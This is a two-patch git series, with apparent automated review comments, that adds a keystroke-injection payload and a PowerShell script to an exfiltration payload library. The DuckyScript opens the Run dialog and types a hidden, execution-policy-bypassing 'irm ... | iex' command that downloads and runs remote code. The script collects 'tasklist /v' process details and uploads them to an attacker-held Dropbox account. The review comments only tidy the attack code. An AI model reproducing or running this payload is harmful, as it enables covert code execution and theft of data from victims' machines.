From 9adf9357ad1977b5a28b27f2d932ffafd9b7ec64 Mon Sep 17 00:00:00 2001
From: Aleff
Date: Mon, 12 Jun 2023 12:04:54 +0200
Subject: [PATCH 1/2] Exfiltrate Process Info
---
 .../ExfiltrateProcessInfo_Windows/payload.txt | 26 +++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt
diff --git a/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt b/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt
new file mode 100644
index 0000000..1b02c91
--- /dev/null
+++ b/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt
@@ -0,0 +1,26 @@
+REM ##########################################
+REM # |
+REM # Title : Exfiltrate Process Info |
+REM # Author : Aleff |
+REM # Version : 1.0 |
+REM # Category : Exfiltration |
+REM # Target : Windows 10-11 |
+REM # |
+REM ##########################################
+
+REM Requirements:
+REM - Internet Connection
+REM - Dropbox Webhook
+
+REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be ExfiltrateProcessInfo.ps1
+DEFINE PAYLOAD example.com
+
+
+DELAY 2000
+GUI r
+DELAY 250
+DELETE
+STRING powershell -w h -ep bypass irm
+STRING PAYLOAD
+STRING | iex
+ENTER
From 0c984bd819be5e3d3eca1f04d4775c9949ee2c3a Mon Sep 17 00:00:00 2001
From: aleff-github
Date: Mon, 12 Jun 2023 12:05:46 +0200
Subject: [PATCH 2/2] script
---
 .../ExfiltrateProcessInfo.ps1 | 36 +++++++++++++++++++
 .../ExfiltrateProcessInfo_Windows/README.md | 36 +++++++++++++++++++
 2 files changed, 72 insertions(+)
 create mode 100644 payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/ExfiltrateProcessInfo.ps1
 create mode 100644 payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/README.md
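Review bot: The requirements comment in this hunk says `REM - Dropbox Webhook`, but the script this payload fetches (ExfiltrateProcessInfo.ps1 in the second patch) authenticates with a Dropbox API access token, not a webhook, so the prerequisite should read `REM - Dropbox API access token`; the README in the second patch repeats the same wording under Settings. The comment above the DEFINE line, `REM REQUIRED - Reply example.com with YOUR LINK`, looks like a typo for `Replace`, and it should state that the value is a URL, since `PAYLOAD` is substituted verbatim into the `irm` command that follows. The header's `Target : Windows 10-11` and the README's `Windows 10,11` should also agree on one spelling.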
diff --git a/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/ExfiltrateProcessInfo.ps1 b/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/ExfiltrateProcessInfo.ps1
new file mode 100644
index 0000000..adf09aa
--- /dev/null
+++ b/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/ExfiltrateProcessInfo.ps1
@@ -0,0 +1,36 @@
+<#
+This function uploads the content of a file called "tasklist_output.txt" to Dropbox using Dropbox API.
+
+Firstly, a temporary file is created using the New-TemporaryFile cmdlet of PowerShell.
+
+Then, the tasklist /v command is used to get the running processes output on the computer.
+
+The output is then written to the temporary file using the Out-File cmdlet.
+
+The Dropbox API endpoint for uploading a file is set, and the API parameters such as the destination path of the file on Dropbox and access credentials are specified.
+
+Finally, the Invoke-RestMethod cmdlet of PowerShell is used to send an HTTP POST request to the Dropbox API and upload the file.
+#>
+function ExfiltrateProcessInfo {
+    $localFilePath = New-TemporaryFile
+    $taskListOutput = tasklist /v
+    $taskListOutput | Out-File -FilePath $localFilePath
+    $dropboxFilePath = "/tasklist_output.txt"
+
+    # Required - Set here your Dropbox Token
+    $accessToken = "example.com"
+    $authHeader = @{Authorization = "Bearer $accessToken"}
+
+    $fileContent = Get-Content $localFilePath
+
+    $uploadUrl = "https://content.dropboxapi.com/2/files/upload"
+
+    $headers = @{}
+    $headers.Add("Authorization", "Bearer $accessToken")
+    $headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
+    $headers.Add("Content-Type", "application/octet-stream")
+
+    Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $fileContent
+}
+
+ExfiltrateProcessInfo
\ No newline at end of file
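Review bot: `$authHeader = @{Authorization = "Bearer $accessToken"}` is assigned but never read; the same Authorization header is added to `$headers` a few lines below, so this line is dead code and should be removed. The comment block at the top of the file says the function "uploads the content of a file called tasklist_output.txt", but no local file of that name exists: the tasklist output goes to a random `New-TemporaryFile` path, and `/tasklist_output.txt` is only the destination path on Dropbox (`$dropboxFilePath`), so the comment should describe it that way. As a point of style, `$headers = @{}` followed by three `.Add` calls can be a single hashtable literal, e.g. `$headers = @{ Authorization = "Bearer $accessToken"; 'Dropbox-API-Arg' = '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}'; 'Content-Type' = 'application/octet-stream' }`.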
diff --git a/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/README.md b/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/README.md
new file mode 100644
index 0000000..17fec93
--- /dev/null
+++ b/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/README.md
@@ -0,0 +1,36 @@
+# Exfiltrate Process Info - Windows ✅
+
+A script used to exfiltrate process info.
+
+**Category**: Exfiltration
+
+## Description
+
+A script used to exfiltrate process info.
+
+This function uploads the content of a file called "tasklist_output.txt" to Dropbox using Dropbox API.
+
+Firstly, a temporary file is created using the New-TemporaryFile cmdlet of PowerShell.
+
+Then, the tasklist /v command is used to get the running processes output on the computer.
+
+The output is then written to the temporary file using the Out-File cmdlet.
+
+The Dropbox API endpoint for uploading a file is set, and the API parameters such as the destination path of the file on Dropbox and access credentials are specified.
+
+Finally, the Invoke-RestMethod cmdlet of PowerShell is used to send an HTTP POST request to the Dropbox API and upload the file.
+
+## Getting Started
+
+### Dependencies
+
+* An internet connection
+* Windows 10,11
+
+### Executing program
+
+* Plug in your device
+
+### Settings
+
+* Dropbox Webhook
\ No newline at end of file